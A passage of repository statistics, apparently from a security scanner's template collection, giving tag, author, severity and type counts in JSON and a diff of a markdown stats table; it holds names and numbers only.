{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"docker","count":4},{"name":"windows","count":4},{"name":"thinkcmf","count":4},{"name":"deserialization","count":4},{"name":"asp","count":4},{"name":"nodejs","count":4},{"name":"thinkphp","count":4},{"name":"moodle","count":4},{"name":"traversal","count":4},{"name":"samsung","count":4},{"name":"crlf","count":4},{"name":"artifactory","count":4},{"name":"tomcat","count":4},{"name":"vpn","count":4},{"name":"hongdian","count":4},{"name":"magmi","count":4},{"name":"webserver","count":4},{"name":"jolokia","count":4},{"name":"elastic","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"zhiyuan","count":3},{"name":"nosqli","count":3},{"name":"printer","count":3},{"name":"ssh","count":3},{"name":"resin","count":3},{"name":"mongodb","count":3},{"name":"vbulletin","count":3},{"name":"zabbix","count":3},{"name":"ebs","count":3},{"name":"kubernetes","count":3},{"name":"wso2","count":3},{"name":"openssh","count":3},{"name":"itop","count":3},{"name":"backups","count":3},{"name":"amazon","count":3},{"name":"cve2008","count":3},{"name":"targa","count":3},{"name":"log","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"r-seenet","count":3},{"name":"tikiwiki","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"microsoft","count":3},{"name":"lfr","count":3},{"name":"slack","count":3},{"name":"fanruan","count":3},{"name":"opensis","count":3},{"name":"kevinlab","count":3},{"name":"hp","count":3},{"name":"fpd","count":3},{"name":"terramaster","count":3},{"name":"caucho","count":3},{"name":"git","count":3},{"name":"symfony","count":3},{"name":"httpd","count":3},{"name":"grafana","count":3},{"name":"oa","count":3},{"name":"nacos","count":3},{"name":"ofbiz","count":3},{"name":"bypass","count":3},{"name":"pega","count":2},{"name":"yapi","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"smb","count":2},{"name":"smtp","count":2},{"name":"dolibarr","count":2},{"name":"vrealize","count":2},{"name":"grav","count":2},{"name":"rockethchat","count":2},{"name":"seeyon","count":2},{"name":"huawei","count":2},{"name":"rstudio","count":2},{"name":"sonarqube","count":2},{"name":"oauth","count":2},{"name":"couchdb","count":2},{"name":"chiyu","count":2},{"name":"nexus","count":2},{"name":"wordfence","count":2},{"name":"shellshock","count":2},{"name":"xxljob","count":2},{"name":"igs","count":2},{"name":"hjtcloud","count":2},{"name":"hashicorp","count":2},{"name":"mail","count":2},{"name":"splunk","count":2},{"name":"azure","count":2},{"name":"activemq","count":2},{"name":"emerge","count":2},{"name":"plesk","count":2},{"name":"linkerd","count":2},{"name":"cache","count":2},{"name":"flir","count":2},{"name":"akkadian","count":2},{"name":"github","count":2},{"name":"rockmongo","count":2},{"name":"nextjs","count":2},{"name":"globalprotect","count":2},{"name":"trixbox","count":2},{"name":"showdoc","count":2},{"name":"ucmdb","count":2},{"name":"ecology","count":2},{"name":"voipmonitor","count":2},{"name":"glassfish","count":2},{"name":"maian","count":2},{"name":"kentico","count":2},{"name":"telerik","count":2},{"name":"hpe","count":2},{"name":"service","count":2},{"name":"natshell","count":2},{"name":"webcam","count":2},{"name":"hasura","count":2},{"name":"bigip","count":2},{"name":"openfire","count":2},{"name":"chamilo","count":2},{"name":"paloalto","count":2},{"name":"horde","count":2},{"name":"nagios","count":2},{"name":"backdoor","count":2},{"name":"saltstack","count":2},{"name":"sharepoint","count":2},{"name":"prometheus","count":2},{"name":"spark","count":2},{"name":"proxy","count":2},{"name":"icewarp","count":2},{"name":"phpcollab","count":2},{"name":"status","count":2},{"name":"mida","count":2},{"name":"cve2007","count":2},{"name":"akamai","count":2},{"name":"waf","count":2},{"name":"kibana","count":2},{"name":"fortios","count":2},{"name":"injection","count":2},{"name":"keycloak","count":2},{"name":"jsf","count":2},{"name":"guacamole","count":2},{"name":"jellyfin","count":2},{"name":"intrusive","count":2},{"name":"sonicwall","count":2},{"name":"odoo","count":2},{"name":"idrac","count":2},{"name":"jeedom","count":2},{"name":"jboss","count":2},{"name":"cve2005","count":2},{"name":"frp","count":2},{"name":"leak","count":2},{"name":"openam","count":2},{"name":"avantfax","count":2},{"name":"opencast","count":1},{"name":"concrete","count":1},{"name":"cherokee","count":1},{"name":"heroku","count":1},{"name":"appweb","count":1},{"name":"adminer","count":1},{"name":"froxlor","count":1},{"name":"upload","count":1},{"name":"xiuno","count":1},{"name":"solman","count":1},{"name":"sitecore","count":1},{"name":"tongda","count":1},{"name":"acme","count":1},{"name":"zcms","count":1},{"name":"uwsgi","count":1},{"name":"nweb2fax","count":1},{"name":"discourse","count":1},{"name":"h3c-imc","count":1},{"name":"maccmsv10","count":1},{"name":"enum","count":1},{"name":"codeigniter","count":1},{"name":"jeewms","count":1},{"name":"addpac","count":1},{"name":"wmt","count":1},{"name":"ns","count":1},{"name":"firebase","count":1},{"name":"fedora","count":1},{"name":"sentry","count":1},{"name":"ilo4","count":1},{"name":"sangfor","count":1},{"name":"centreon","count":1},{"name":"saltapi","count":1},{"name":"wiki","count":1},{"name":"zeroshell","count":1},{"name":"zzzcms","count":1},{"name":"enumeration","count":1},{"name":"rabbitmq","count":1},{"name":"mysql","count":1},{"name":"sprintful","count":1},{"name":"csod","count":1},{"name":"extractor","count":1},{"name":"visualtools","count":1},{"name":"nuuo","count":1},{"name":"wavemaker","count":1},{"name":"thinkadmin","count":1},{"name":"qcubed","count":1},{"name":"openx","count":1},{"name":"etouch","count":1},{"name":"nedi","count":1},{"name":"ssltls","count":1},{"name":"emc","count":1},{"name":"rmi","count":1},{"name":"fuelcms","count":1},{"name":"ruckus","count":1},{"name":"lg-nas","count":1},{"name":"xff","count":1},{"name":"proftpd","count":1},{"name":"powercreator","count":1},{"name":"tileserver","count":1},{"name":"glances","count":1},{"name":"flink","count":1},{"name":"pulsesecure","count":1},{"name":"javafaces","count":1},{"name":"zenario","count":1},{"name":"dvr","count":1},{"name":"turbocrm","count":1},{"name":"websvn","count":1},{"name":"opm","count":1},{"name":"nexusdb","count":1},{"name":"gridx","count":1},{"name":"cobub","count":1},{"name":"redhat","count":1},{"name":"starttls","count":1},{"name":"cerebro","count":1},{"name":"nc2","count":1},{"name":"selea","count":1},{"name":"bedita","count":1},{"name":" default-login","count":1},{"name":"nsasg","count":1},{"name":"faraday","count":1},{"name":"spf","count":1},{"name":"bolt","count":1},{"name":"commscope","count":1},{"name":"calendarix","count":1},{"name":"pyramid","count":1},{"name":"74cms","count":1},{"name":"accela","count":1},{"name":"gitlist","count":1},{"name":"pgadmin","count":1},{"name":"panos","count":1},{"name":"octobercms","count":1},{"name":"alertmanager","count":1},{"name":"opensmtpd","count":1},{"name":"xdcms","count":1},{"name":"labtech","count":1},{"name":"phalcon","count":1},{"name":"sqlite","count":1},{"name":"dotclear","count":1},{"name":"duomicms","count":1},{"name":"jenkin","count":1},{"name":"cocoon","count":1},{"name":"timesheet","count":1},{"name":"jnoj","count":1},{"name":"wuzhicms","count":1},{"name":"rsyncd","count":1},{"name":"mirai","count":1},{"name":"springframework","count":1},{"name":"plc","count":1},{"name":"wazuh","count":1},{"name":"arl","count":1},{"name":"redis","count":1},{"name":"haproxy","count":1},{"name":"linux","count":1},{"name":"csrf","count":1},{"name":"xml","count":1},{"name":"cse","count":1},{"name":"goahead","count":1},{"name":"cloudflare","count":1},{"name":"nordex","count":1},{"name":"checkpoint","count":1},{"name":"vsftpd","count":1},{"name":"beanshell","count":1},{"name":"lancom","count":1},{"name":"openstack","count":1},{"name":"mara","count":1},{"name":"spectracom","count":1},{"name":"fastcgi","count":1},{"name":"tensorboard","count":1},{"name":"ioncube","count":1},{"name":"expose","count":1},{"name":"cloudinary","count":1},{"name":"nomad","count":1},{"name":"gotmls","count":1},{"name":"zend","count":1},{"name":"phpinfo","count":1},{"name":"aruba","count":1},{"name":"optiLink","count":1},{"name":"moinmoin","count":1},{"name":"spidercontrol","count":1},{"name":"cacti","count":1},{"name":"alerta","count":1},{"name":"episerver","count":1},{"name":"zm","count":1},{"name":"node-red-dashboard","count":1},{"name":"discord","count":1},{"name":"glpi","count":1},{"name":"primetek","count":1},{"name":"drone","count":1},{"name":"qsan","count":1},{"name":"db","count":1},{"name":"lanproxy","count":1},{"name":"argussurveillance","count":1},{"name":"sage","count":1},{"name":"smartsense","count":1},{"name":"livezilla","count":1},{"name":"magicflow","count":1},{"name":"emby","count":1},{"name":"varnish","count":1},{"name":"email","count":1},{"name":"kafdrop","count":1},{"name":"upnp","count":1},{"name":"lutron","count":1},{"name":"servicedesk","count":1},{"name":"netis","count":1},{"name":"fortigate","count":1},{"name":"visionhub","count":1},{"name":"subrion","count":1},{"name":"feifeicms","count":1},{"name":"memcached","count":1},{"name":"wamp","count":1},{"name":"dompdf","count":1},{"name":"woocomernce","count":1},{"name":"auth","count":1},{"name":"sarg","count":1},{"name":"ambari","count":1},{"name":"openrestry","count":1},{"name":"b2evolution","count":1},{"name":"rfi","count":1},{"name":"ghost","count":1},{"name":"bigbluebutton","count":1},{"name":"lighttpd","count":1},{"name":"eprints","count":1},{"name":"nette","count":1},{"name":"k8s","count":1},{"name":"mobileiron","count":1},{"name":"linksys","count":1},{"name":"panabit","count":1},{"name":"cgi","count":1},{"name":"phpfusion","count":1},{"name":"eyou","count":1},{"name":"2014","count":1},{"name":"embedthis","count":1},{"name":"traefik","count":1},{"name":"netsweeper","count":1},{"name":"spip","count":1},{"name":"openemr","count":1},{"name":"postgres","count":1},{"name":"ssl","count":1},{"name":"chevereto","count":1},{"name":"clink-office","count":1},{"name":"qvisdvr","count":1},{"name":"mantis","count":1},{"name":"anchorcms","count":1},{"name":"metinfo","count":1},{"name":"comodo","count":1},{"name":"esmtp","count":1},{"name":"openerp","count":1},{"name":"aura","count":1},{"name":"hadoop","count":1},{"name":"tapestry","count":1},{"name":"pacsone","count":1},{"name":"majordomo2","count":1},{"name":"nuxeo","count":1},{"name":"scimono","count":1},{"name":"zookeeper","count":1},{"name":"ruby","count":1},{"name":"dotnet","count":1},{"name":"domxss","count":1},{"name":"scs","count":1},{"name":"sgp","count":1},{"name":"triconsole","count":1},{"name":"klog","count":1},{"name":"achecker","count":1},{"name":"geddy","count":1},{"name":"pagespeed","count":1},{"name":"dnssec","count":1},{"name":"ulterius","count":1},{"name":"xmlchart","count":1},{"name":"swagger","count":1},{"name":"robomongo","count":1},{"name":"octoprint","count":1},{"name":"qdpm","count":1},{"name":"plastic","count":1},{"name":"setup","count":1},{"name":"gateone","count":1},{"name":"soar","count":1},{"name":"floc","count":1},{"name":"tieline","count":1},{"name":"fortiweb","count":1},{"name":"tamronos","count":1},{"name":"viewpoint","count":1},{"name":"influxdb","count":1},{"name":"hiboss","count":1},{"name":"gloo","count":1},{"name":"k8","count":1},{"name":"fiori","count":1},{"name":"plugin","count":1},{"name":"huijietong","count":1},{"name":"crm","count":1},{"name":"circontrol","count":1},{"name":"circontrorl","count":1},{"name":"zarafa","count":1},{"name":"monitorr","count":1},{"name":"rhymix","count":1},{"name":"exchange","count":1},{"name":"ems","count":1},{"name":"wildfly","count":1},{"name":"opensns","count":1},{"name":"dom","count":1},{"name":"bookstack","count":1},{"name":"gogs","count":1},{"name":"favicon","count":1},{"name":"mautic","count":1},{"name":"getsimple","count":1},{"name":"webadmin","count":1},{"name":"manageengine","count":1},{"name":"redwood","count":1},{"name":"mongoshake","count":1},{"name":"ecom","count":1},{"name":"prestashop","count":1},{"name":"empirecms","count":1},{"name":"vsphere","count":1},{"name":"wondercms","count":1},{"name":"acontent","count":1},{"name":"phpunit","count":1},{"name":"alibaba","count":1},{"name":"servicenow","count":1},{"name":"resourcespace","count":1},{"name":"druid","count":1},{"name":"clave","count":1},{"name":"xvr","count":1},{"name":"redcap","count":1},{"name":"tensorflow","count":1},{"name":"hortonworks","count":1},{"name":"mariadb","count":1},{"name":"webmodule-ee","count":1},{"name":"perl","count":1},{"name":"gespage","count":1},{"name":"netdata","count":1},{"name":"javamelody","count":1},{"name":"timeclock","count":1},{"name":"fortinet","count":1},{"name":"netrc","count":1},{"name":"npm","count":1},{"name":"bash","count":1},{"name":"xunchi","count":1},{"name":"avtech","count":1},{"name":"dotnetnuke","count":1},{"name":"realteo","count":1},{"name":"plone","count":1},{"name":"default","count":1},{"name":"apos","count":1},{"name":"ec2","count":1},{"name":"blackboard","count":1},{"name":"sureline","count":1},{"name":"doh","count":1},{"name":"webui","count":1},{"name":"sco","count":1},{"name":"wavlink","count":1},{"name":"postmessage","count":1},{"name":"ganglia","count":1},{"name":"kyan","count":1},{"name":"pippoint","count":1},{"name":"jquery","count":1},{"name":"ntopng","count":1},{"name":"chinaunicom","count":1},{"name":"weiphp","count":1},{"name":"webmin","count":1},{"name":"api-manager","count":1},{"name":"idemia","count":1},{"name":"mailchimp","count":1},{"name":"rdp","count":1},{"name":"synnefo","count":1},{"name":"mdb","count":1},{"name":"dvwa","count":1},{"name":"payara","count":1},{"name":"grails","count":1},{"name":"biometrics","count":1},{"name":"office365","count":1},{"name":"mpsec","count":1},{"name":"landray","count":1},{"name":"tika","count":1},{"name":"svnserve","count":1},{"name":"yachtcontrol","count":1},{"name":"oscommerce","count":1},{"name":"kong","count":1},{"name":"fortigates","count":1},{"name":"rujjie","count":1},{"name":"mcafee","count":1},{"name":"krweb","count":1},{"name":"linkedin","count":1},{"name":"shopware","count":1},{"name":"keenetic","count":1},{"name":"fortilogger","count":1},{"name":"node","count":1},{"name":"totaljs","count":1},{"name":"jenzabar","count":1},{"name":"mediumish","count":1},{"name":"htmli","count":1},{"name":"exposures","count":1},{"name":"blind","count":1},{"name":"landrayoa","count":1},{"name":"bruteforce","count":1},{"name":"svn","count":1},{"name":"codemeter","count":1},{"name":"jitsi","count":1},{"name":"wooyun","count":1},{"name":"tpshop","count":1},{"name":"finereport","count":1},{"name":"parentlink","count":1},{"name":"erp-nc","count":1},{"name":"avalanche","count":1},{"name":"cors","count":1},{"name":"jsp","count":1},{"name":"exacqvision","count":1},{"name":"mantisbt","count":1},{"name":"rubedo","count":1},{"name":"clockwatch","count":1},{"name":"vnc","count":1},{"name":"monitorix","count":1},{"name":"apiman","count":1},{"name":"seacms","count":1},{"name":"geutebruck","count":1},{"name":"stem","count":1},{"name":"sourcebans","count":1},{"name":"ueditor","count":1},{"name":"kerbynet","count":1},{"name":"harbor","count":1},{"name":"yealink","count":1},{"name":"acexy","count":1},{"name":"razor","count":1},{"name":"vscode","count":1},{"name":"nps","count":1},{"name":"expressjs","count":1},{"name":"skywalking","count":1},{"name":"bitly","count":1},{"name":"ricoh","count":1},{"name":"blue-ocean","count":1},{"name":"lotuscms","count":1},{"name":"liferay","count":1},{"name":"portainer","count":1},{"name":"shopxo","count":1},{"name":"trilithic","count":1},{"name":"rmc","count":1},{"name":"jmx","count":1},{"name":"myucms","count":1},{"name":"st","count":1},{"name":"expn","count":1},{"name":"szhe","count":1},{"name":"moin","count":1},{"name":"sidekiq","count":1},{"name":"wing-ftp","count":1},{"name":"yii","count":1},{"name":"javascript","count":1},{"name":"aspnuke","count":1},{"name":"spring","count":1},{"name":"webftp","count":1},{"name":"socomec","count":1},{"name":"wifisky","count":1},{"name":"sceditor","count":1},{"name":"camunda","count":1},{"name":"tenda","count":1},{"name":"opentsdb","count":1},{"name":"twitter-server","count":1},{"name":"jfrog","count":1},{"name":"iptime","count":1},{"name":"bullwark","count":1},{"name":"mongo","count":1},{"name":"cve2006","count":1},{"name":"lansweeper","count":1},{"name":"zyxel","count":1},{"name":"darkstat","count":1},{"name":"axis","count":1},{"name":"clusterengine","count":1},{"name":"viewlinc","count":1},{"name":"fastapi","count":1},{"name":"zte","count":1},{"name":"kubeflow","count":1},{"name":"flash","count":1},{"name":"cofax","count":1},{"name":"salesforce","count":1},{"name":"interlib","count":1},{"name":"zmanda","count":1},{"name":"diris","count":1},{"name":"centos","count":1}],"authors":[{"name":"pikpikcu","count":234},{"name":"dhiyaneshdk","count":234},{"name":"pdteam","count":191},{"name":"daffainfo","count":128},{"name":"geeknik","count":127},{"name":"dwisiswant0","count":127},{"name":"gy741","count":62},{"name":"madrobot","count":60},{"name":"princechaddha","count":53},{"name":"gaurang","count":42},{"name":"pussycat0x","count":40},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":23},{"name":"philippedelteil","count":17},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"r3dg33k","count":9},{"name":"hackergautam","count":9},{"name":"wdahlenb","count":9},{"name":"iamthefrogy","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"melbadry9","count":8},{"name":"that_juan_","count":8},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"dr_set","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"meme-lord","count":5},{"name":"rootxharsh","count":5},{"name":"ganofins","count":5},{"name":"pentest_swissky","count":5},{"name":"joanbono","count":5},{"name":"iamnoooob","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":4},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"f1tz","count":3},{"name":"binaryfigments","count":3},{"name":"0w4ys","count":3},{"name":"thomas_from_offensity","count":3},{"name":"fyoorer","count":3},{"name":"_generic_human_","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"shine","count":3},{"name":"shifacyclewala","count":3},{"name":"vsh00t","count":3},{"name":"emenalf","count":3},{"name":"mavericknerd","count":3},{"name":"dudez","count":3},{"name":"impramodsargar","count":3},{"name":"jarijaas","count":3},{"name":"z3bd","count":3},{"name":"tess","count":3},{"name":"vavkamil","count":2},{"name":"0xsapra","count":2},{"name":"bp0lr","count":2},{"name":"pxmme1337","count":2},{"name":"random-robbie","count":2},{"name":"x1m_martijn","count":2},{"name":"ree4pwn","count":2},{"name":"moritz nentwig","count":2},{"name":"gevakun","count":2},{"name":"davidmckennirey","count":2},{"name":"0xcrypto","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"zomsop82","count":2},{"name":"w4cky_","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xrudra","count":2},{"name":"sushantkamble","count":2},{"name":"swissky","count":2},{"name":"lu4nx","count":2},{"name":"afaq","count":2},{"name":"incogbyte","count":2},{"name":"lotusdll","count":2},{"name":"koti2","count":2},{"name":"foulenzer","count":2},{"name":"gal nagli","count":2},{"name":"0xprial","count":2},{"name":"hetroublemakr","count":2},{"name":"ehsahil","count":2},{"name":"amsda","count":2},{"name":"bsysop","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"udit_thakkur","count":2},{"name":"bing0o","count":2},{"name":"randomrobbie","count":2},{"name":"manas_harsh","count":2},{"name":"alifathi-h1","count":2},{"name":"0xelkomy","count":2},{"name":"nkxxkn","count":2},{"name":"kiblyn11","count":2},{"name":"unstabl3","count":2},{"name":"hahwul","count":2},{"name":"soyelmago","count":1},{"name":"me9187","count":1},{"name":"its0x08","count":1},{"name":"0ut0fb4nd","count":1},{"name":"gboddin","count":1},{"name":"knassar702","count":1},{"name":"pudsec","count":1},{"name":"tirtha_mandal","count":1},{"name":"zandros0","count":1},{"name":"petruknisme","count":1},{"name":"taielab","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"alperenkesk","count":1},{"name":"mesaglio","count":1},{"name":"bjhulst","count":1},{"name":"sullo","count":1},{"name":"wabafet","count":1},{"name":"bernardofsr","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sy3omda","count":1},{"name":"yavolo","count":1},{"name":"_harleo","count":1},{"name":"0xteles","count":1},{"name":"d0rkerdevil","count":1},{"name":"juicypotato1","count":1},{"name":"revblock","count":1},{"name":"0xtavian","count":1},{"name":"kurohost","count":1},{"name":"0h1in9e","count":1},{"name":"adrianmf","count":1},{"name":"mass0ma","count":1},{"name":"shreyapohekar","count":1},{"name":"naglinagli","count":1},{"name":"ldionmarcil","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"0xrod","count":1},{"name":"defr0ggy","count":1},{"name":"dogasantos","count":1},{"name":"jteles","count":1},{"name":"b4uh0lz","count":1},{"name":"s1r1u5_","count":1},{"name":"fmunozs","count":1},{"name":"noamrathaus","count":1},{"name":"regala_","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"cookiehanhoan","count":1},{"name":"r3naissance","count":1},{"name":"ooooooo_q","count":1},{"name":"un-fmunozs","count":1},{"name":"retr0","count":1},{"name":"vzamanillo","count":1},{"name":"ringo","count":1},{"name":"omarkurt","count":1},{"name":"andirrahmani1","count":1},{"name":"akash.c","count":1},{"name":"luskabol","count":1},{"name":"yashanand155","count":1},{"name":"mah3sec_","count":1},{"name":"thezakman","count":1},{"name":"huowuzhao","count":1},{"name":"ohlinge","count":1},{"name":"arcc","count":1},{"name":"_darrenmartyn","count":1},{"name":"iampritam","count":1},{"name":"b0yd","count":1},{"name":"shifacyclewla","count":1},{"name":"undefl0w","count":1},{"name":"mubassirpatel","count":1},{"name":"raesene","count":1},{"name":"zhenwarx","count":1},{"name":"chron0x","count":1},{"name":"abison_binoy","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"52971","count":1},{"name":"elder tao","count":1},{"name":"schniggie","count":1},{"name":"bolli95","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"absshax","count":1},{"name":"ahmed sherif","count":1},{"name":"mhdsamx","count":1},{"name":"kareemse1im","count":1},{"name":"qlkwej","count":1},{"name":"makyotox","count":1},{"name":"tim_koopmans","count":1},{"name":"shelld3v","count":1},{"name":"streetofhackerr007","count":1},{"name":"aresx","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"bad5ect0r","count":1},{"name":"udyz","count":1},{"name":"furkansenan","count":1},{"name":"smaranchand","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"j33n1k4","count":1},{"name":"sshell","count":1},{"name":"apt-mirror","count":1},{"name":"elmahdi","count":1},{"name":"willd96","count":1},{"name":"jeya seelan","count":1},{"name":"sickwell","count":1},{"name":"nytr0gen","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"becivells","count":1},{"name":"idealphase","count":1},{"name":"alph4byt3","count":1},{"name":"dawid czarnecki","count":1},{"name":"yashgoti","count":1},{"name":"andysvints","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"c3l3si4n","count":1},{"name":"deena","count":1},{"name":"berkdusunur","count":1},{"name":"johnk3r","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"alex","count":1},{"name":"@dwisiswant0","count":1},{"name":"ilovebinbash","count":1},{"name":"philippdelteil","count":1},{"name":"manuelbua","count":1},{"name":"luci","count":1},{"name":"blckraven","count":1},{"name":"ipanda","count":1},{"name":"hanlaomo","count":1},{"name":"divya_mudgal","count":1},{"name":"akshansh","count":1},{"name":"whynotke","count":1},{"name":"rtcms","count":1},{"name":"hakluke","count":1},{"name":"affix","count":1},{"name":"pratik khalane","count":1},{"name":"fopina","count":1},{"name":"patralos","count":1},{"name":"_c0wb0y_","count":1},{"name":"mohammedsaneem","count":1},{"name":"daviey","count":1},{"name":"notsoevilweasel","count":1},{"name":"rodnt","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"kabirsuda","count":1},{"name":"rojanrijal","count":1},{"name":"johnjhacking","count":1},{"name":"co0nan","count":1},{"name":"flag007","count":1},{"name":"ajaysenr","count":1},{"name":"remonsec","count":1},{"name":"exploitation","count":1},{"name":"toufik airane","count":1},{"name":"th3.d1p4k","count":1},{"name":"sicksec","count":1},{"name":"pdp","count":1},{"name":"micha3lb3n","count":1},{"name":"thevillagehacker","count":1},{"name":"geraldino2","count":1}],"directory":[{"name":"Users","count":1828}],"severity":[{"name":"info","count":577},{"name":"high","count":457},{"name":"medium","count":385},{"name":"critical","count":218},{"name":"low","count":156}],"types":[{"name":"http","count":1696},{"name":"file","count":46},{"name":"network","count":35},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 881aaf64de..3922025efe 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,684 +1,698 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 | -| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 | -| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 | -| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 | -| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | | -| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | | -| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | | -| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | | -| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | | -| tech | 97 | gaurang | 42 | workflows | 34 | | | | | -| config | 90 | pussycat0x | 36 | miscellaneous | 27 | | | | | -| cve2021 | 88 | ice3man | 26 | network | 27 | | | | | -| cve2019 | 84 | organiccrap | 24 | iot | 23 | | | | | -| takeover | 72 | 0x_akoko | 20 | dns | 11 | | | | | -| cve2018 | 69 | philippedelteil | 16 | fuzzing | 10 | | | | | -| | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | -| token | 64 | milo2012 | 14 | headless | 5 | | | | | -| apache | 62 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 51 | techbrunchfr | 13 | | | | | | | -| cve2017 | 45 | suman_kar | 12 | | | | | | | -| file | 44 | cyllective | 11 | | | | | | | -| iot | 44 | righettod | 10 | | | | | | | -| unauth | 42 | random_robbie | 10 | | | | | | | -| oob | 35 | hackergautam | 9 | | | | | | | -| network | 35 | wdahlenb | 9 | | | | | | | -| sqli | 34 | melbadry9 | 8 | | | | | | | -| oracle | 29 | that_juan_ | 8 | | | | | | | -| workflow | 29 | aashiq | 8 | | | | | | | -| logs | 29 | iamthefrogy | 8 | | | | | | | -| ssrf | 28 | r3dg33k | 8 | | | | | | | -| cve2016 | 27 | nadino | 8 | | | | | | | -| misc | 27 | harshbothra_ | 7 | | | | | | | -| jira | 26 | 0x240x23elu | 7 | | | | | | | -| atlassian | 26 | emadshanab | 7 | | | | | | | -| disclosure | 25 | techryptic (@tech) | 7 | | | | | | | -| listing | 24 | randomstr1ng | 7 | | | | | | | -| redirect | 21 | dr_set | 7 | | | | | | | -| aem | 19 | oppsec | 7 | | | | | | | -| cisco | 18 | kophjager007 | 7 | | | | | | | -| sap | 16 | __fazal | 6 | | | | | | | -| cve2015 | 16 | caspergn | 6 | | | | | | | -| debug | 14 | puzzlepeaches | 6 | | | | | | | -| cve2012 | 14 | iamnoooob | 5 | | | | | | | -| cve2014 | 13 | ganofins | 5 | | | | | | | -| auth-bypass | 13 | panch0r3d | 5 | | | | | | | -| struts | 13 | joanbono | 5 | | | | | | | -| android | 13 | yanyun | 5 | | | | | | | -| misconfig | 13 | pentest_swissky | 5 | | | | | | | -| fuzz | 13 | rootxharsh | 5 | | | | | | | -| adobe | 12 | xelkomy | 4 | | | | | | | -| jenkins | 12 | elsfa7110 | 4 | | | | | | | -| cve2011 | 12 | meme-lord | 4 | | | | | | | -| dns | 12 | github.com/its0x08 | 4 | | | | | | | -| weblogic | 12 | nodauf | 4 | | | | | | | -| devops | 11 | e_schultze_ | 4 | | | | | | | -| zoho | 11 | fyoorer | 3 | | | | | | | -| dlink | 11 | shifacyclewala | 3 | | | | | | | -| router | 11 | dudez | 3 | | | | | | | -| springboot | 11 | f1tz | 3 | | | | | | | -| cve2013 | 10 | mavericknerd | 3 | | | | | | | -| php | 10 | thomas_from_offensity | 3 | | | | | | | -| magento | 9 | vsh00t | 3 | | | | | | | -| ftp | 8 | impramodsargar | 3 | | | | | | | -| gitlab | 8 | z3bd | 3 | | | | | | | -| aws | 8 | shine | 3 | | | | | | | -| rails | 8 | jarijaas | 3 | | | | | | | -| airflow | 8 | 0w4ys | 3 | | | | | | | -| cnvd | 8 | binaryfigments | 3 | | | | | | | -| scada | 7 | tess | 3 | | | | | | | -| cve2009 | 7 | _generic_human_ | 3 | | | | | | | -| joomla | 7 | yash anand @yashanand155 | 3 | | | | | | | -| nginx | 7 | emenalf | 2 | | | | | | | -| xxe | 7 | random-robbie | 2 | | | | | | | -| vmware | 7 | lotusdll | 2 | | | | | | | -| login | 7 | hetroublemakr | 2 | | | | | | | -| coldfusion | 6 | unstabl3 | 2 | | | | | | | -| google | 6 | koti2 | 2 | | | | | | | -| jetty | 6 | bp0lr | 2 | | | | | | | -| cms | 6 | moritz nentwig | 2 | | | | | | | -| backup | 6 | vavkamil | 2 | | | | | | | -| citrix | 6 | manas_harsh | 2 | | | | | | | -| api | 6 | amsda | 2 | | | | | | | -| rconfig | 6 | nkxxkn | 2 | | | | | | | -| dell | 6 | dheerajmadhukar | 2 | | | | | | | -| drupal | 5 | pxmme1337 | 2 | | | | | | | -| phpmyadmin | 5 | udit_thakkur | 2 | | | | | | | -| dedecms | 5 | 0xprial | 2 | | | | | | | -| lucee | 5 | 